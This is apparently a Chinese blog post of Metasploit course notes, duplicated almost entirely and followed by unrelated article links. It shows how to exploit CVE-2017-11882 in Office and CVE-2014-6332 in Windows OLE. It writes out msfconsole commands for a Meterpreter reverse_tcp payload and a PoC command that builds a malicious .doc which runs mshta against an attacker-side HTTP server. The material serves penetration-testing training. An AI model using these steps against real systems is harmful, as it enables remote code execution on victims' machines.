4.Metasploit框架更新
Metasploit 进阶第二讲 框架更新
EDB平台-互联网安全漏洞库
Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。
exploits:漏洞信息
papers:文章
GHDB: Google hacking
shellcodes:填充数据
CVE-2017-11882介绍
CVE-2017-11882Ofice远程代码执行漏洞:
由Microsoft office中的公式编辑器造成,该模块以OLE(Object Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。
完美无弹窗,无异常,影响office全版本。
CVE和MS:
CVE是Common Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。
MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-
us/security/bulletins查找最新的各种相关信息。
由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html。
MSF添加exploit及更新Metasploit框架
添加exploit:
1.将下载的rb文件放入对应的文件夹下
2.执行reload_all或重新启动MSF
更新metasploit框架:
apt update;apt install metasploit-framework
实操:利用CVE-2017-11882攻击目标主机
MSF:
search 2017_11882
use exploit/windows/...
info
show options
set uripath/
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.24.137
run
生成POC程序(带有shell的doc文件):
python CVE-2017-11882.py -c“mshta
http://192.168.24.137:8080/"-o11882.doc
其他POC程序生成:
https://github.com/Ridter/CVE-2017-11882
python CVE-2017-11882.py-c"cmd.exe/c
calc.cxe" –o 11882.doc
metasploit攻击win8实例
Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):
OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。
Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008
SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012
Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览器查看网页时允许远程执行任意代码。
可能会遇到的问题:
1.Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)
lsof-i:4444 -> kill -9 PID(man lsof -> man kill)
2.注意查看报错信息,多检索
metasploit框架打开方式:
msfconsole 启动命令行模式
armitage 启动图形化界面方式
Metasploit 进阶第二讲
框架更新
01 Exploit_db平台介绍
02 MSF添加exploit更新MSF
03 CVE-2017-11882利用实例
04合天网安实验室攻击win8实例
EDB平台-互联网安全漏洞库
Exploit_DB是一个面向全世界安全工作人员的漏洞提交平台,是一份公开已知漏洞的存档,便于企业改善公司的安全情况,同时帮助安全研究人员及渗透测试工程师进行更好的安全测试工作。
exploits:漏洞信息
papers:文章
GHDB: Google hacking
shellcodes:填充数据
CVE-2017-11882介绍
CVE-2017-11882Ofice远程代码执行漏洞:
由Microsoft office中的公式编辑器造成,该模块以OLE(Object Linking and Embedding,对象链接与嵌入)技术将公式嵌入在Office文档内,由于编辑器没有对名称长度进行校验,导致缓冲区溢出,若攻击者通过构造特殊字符,office无法正确处理内存对象,成功利用该漏洞的攻击者将能以当前用户身份在目标操作系统执行任意代码。
完美无弹窗,无异常,影响office全版本。
CVE和MS:
CVE是Common Vulnerabilities and Exposures的缩写,意思是公共漏洞及披露。它是一个漏洞字典,由MITRE维护,给每个暴露出来漏洞给一个公共的名称。可以在cve.mitre.org/cve/index.html中查看漏洞列表。
MS是微软维护的自身的漏洞列表。可以在technet.microsoft.com/en-
us/security/bulletins查找最新的各种相关信息。
由于两者标准不统一,为了更好对应,MITRE提供一个对应列表cve.mitre.org/data/refs/refmap/source-MS.html。
MSF添加exploit及更新Metasploit框架
添加exploit:
1.将下载的rb文件放入对应的文件夹下
2.执行reload_all或重新启动MSF
更新metasploit框架:
apt update;apt install metasploit-framework
实操:利用CVE-2017-11882攻击目标主机
MSF:
search 2017_11882
use exploit/windows/...
info
show options
set uripath/
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.24.137
run
生成POC程序(带有shell的doc文件):
python CVE-2017-11882.py -c“mshta
http://192.168.24.137:8080/"-o11882.doc
其他POC程序生成:
https://github.com/Ridter/CVE-2017-11882
python CVE-2017-11882.py-c"cmd.exe/c
calc.cxe" –o 11882.doc
合天网安实验室:metasploit攻击win8实例
Microsoft Windows OLE远程代码执行漏洞(CVE-2014-6332、MS14-064):
OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。
Microsoft Windows Server 2003 SP2,Windows Vista SP2,Windows Server 2008
SP2/R2 SP1,Windows 7 SP1,Windows 8,Windows 8.1,Windows Server 2012
Gold/R2,Windows RT Gold/8.1版本在实现上存在Windows OLE自动化数组远程代码执行漏洞,远程攻击者利用此漏洞构造特殊的网页,用户使用IE浏览
器查看网页时允许远程执行任意代码。
可能会遇到的问题:
- Rex::BindFailed The address is already in use or unavailable:(0.0.0.0:4444)
lsof-i:4444 -> kill -9 PID(man lsof -> man kill)
2.注意查看报错信息,多检索
metasploit框架打开方式:
msfconsole 启动命令行模式
armitage 启动图形化界面方式

4.Metasploit框架更新的更多相关文章
- iOS将自己的框架更新到cocopods上
第一步 把自己的框架更新到github 上,为了提交地址给他人下载.这里就不详细介绍如何把项目更新到github上了 第二步 这个时候我们的项目已经挂在github上了我们需要给本地的项目新建一个Po ...
- iOS中 如何将自己的框架更新到cocopods上 韩俊强的博客
每日更新关注:http://weibo.com/hanjunqiang 新浪微博! 为了更方便的集成第三方框架有了cocopods 的, 当我们有了相对比较好的框架的时候如何更新到cocopods ...
- 将自己的框架更新到cocopods上
为了更方便的集成第三方框架有了cocopods 的, 当我们有了相对比较好的框架的时候如何更新到cocopods 供他人参考呢? 下面我一步一步带大家开源自己的框架. 第一步 把自己的框架更新到git ...
- 认识Metasploit框架
Metasploit基础 认识Metaspliot框架 Metaspliot(MSF)渗透测试框架,提供众多的接口.选项.变量.模块以供渗透工作人员使用它完成一系列的渗透攻击. 渗透攻击(Expl ...
- BitAdminCore框架更新日志20180531
索引 NET Core应用框架之BitAdminCore框架应用篇系列 框架演示:http://bit.bitdao.cn 框架源码:https://github.com/chenyinxin/coo ...
- BitAdminCore框架更新日志20180529
索引 NET Core应用框架之BitAdminCore框架应用篇系列 框架演示:http://bit.bitdao.cn 框架源码:https://github.com/chenyinxin/coo ...
- BitAdminCore框架更新日志20180523
20180523更新内容 本次更新两个内容,一是增加视频处理功能,二是增加定时服务功能. 视频处理 定时服务 BitAdminCore框架,用最少的代码,实现最多的功能 本次新暂未发布,后续有空发布 ...
- BitAdminCore框架更新日志20180522
20180522更新内容 本次更新增加了excel导入导出示例,QuerySuite组件实现导出导出,用最少代码,做最多的事,代码就是如此简单. 计划修改内容 1.人脸登录功能需要重构,目前功能不完善 ...
- BitAdminCore框架更新日志20180519
20180519更新内容 昨天更新的版本,早上自己下载下来发现创建项目不成功. 这个问题已经多次出现,主要是cookiecutter编码问题,项目引用大量外部js文件,部分文件在复制的时候编码较验不通 ...
随机推荐
- idea使用Tomcat部署war 和 war exploded的区别
war模式:将WEB工程一包的形式上传到服务器中.war exploded模式:将WEB工程以当前文件夹的位置关系上传到服务器.解析:war 模式这种可以称为是发布模式(完整的项目),将项目打成war ...
- 一次 Druid 连接池泄露引发的血案!
最近某个应用程序老是卡,需要重启才能解决问题,导致被各种投诉,排查问题是 Druid 连接池泄露引发的血案.. 异常日志如下: ERROR - com.alibaba.druid.pool.GetCo ...
- 量子计算机编程(二)——QPU基础函数
第二部分主要是QPU的基础功能,第一部分就像是我们有了哪些基本的语句,第二部分就是我们能写一些简单基础的函数,一些小模块,第三部分就是他的应用了. 先来看一下一个简单量子应用的结构: 第一步,将量子态 ...
- PHP mysql事务问题实例分析
本文实例分析了PHP的mysql事务问题.分享给大家供大家参考,具体如下: 对于myisam数据库,可以控制事务的进行: $mysqlrl = mysql_connect ( $db_config [ ...
- Redux 架构理解
Redux 是一种前端“架构模式”,是 Flux 架构的一种变种,用来提供可预测的状态管理.虽然经常和 React 一起被提及,但是 Redux 却不仅仅只能用于 React,还可以将其运用到其他前端 ...
- 置顶,博客中所有源码 github
所有项目源代码,开源地址. 作者 github 主页 https://github.com/nejidev 目前开源项目有: 1, linux tea5767 at24c08 mmap 实现fm 收音 ...
- aosp Pixel 修改 SIM 卡支持及解决网络带x问题
去除网络X的方法 adb shell settings put global captive_portal_https_url http://g.cn/generate_204 自己用 php 做一个 ...
- 【图文+视频新手也友好】Java一维数组详细讲解(内含练习题答案+详解彩蛋喔~)
目录 视频讲解: 一.数组的概述 二.一维数组的使用 三.Arrays工具类中的sort方法(sort方法用的多,我们具体讲一下) 四.数组中的常见异常 五.一维数组练习题 六.彩蛋(本期视频使用的P ...
- C++ 重载关系操作符
#include <iostream> using namespace std; class AAA { public: AAA() //默认构造 { } AAA(int id, stri ...
- axios请求拦截器
import axios from 'axios'; // 创建axios实例 let service = null; if (process.env.NODE_ENV === 'deve ...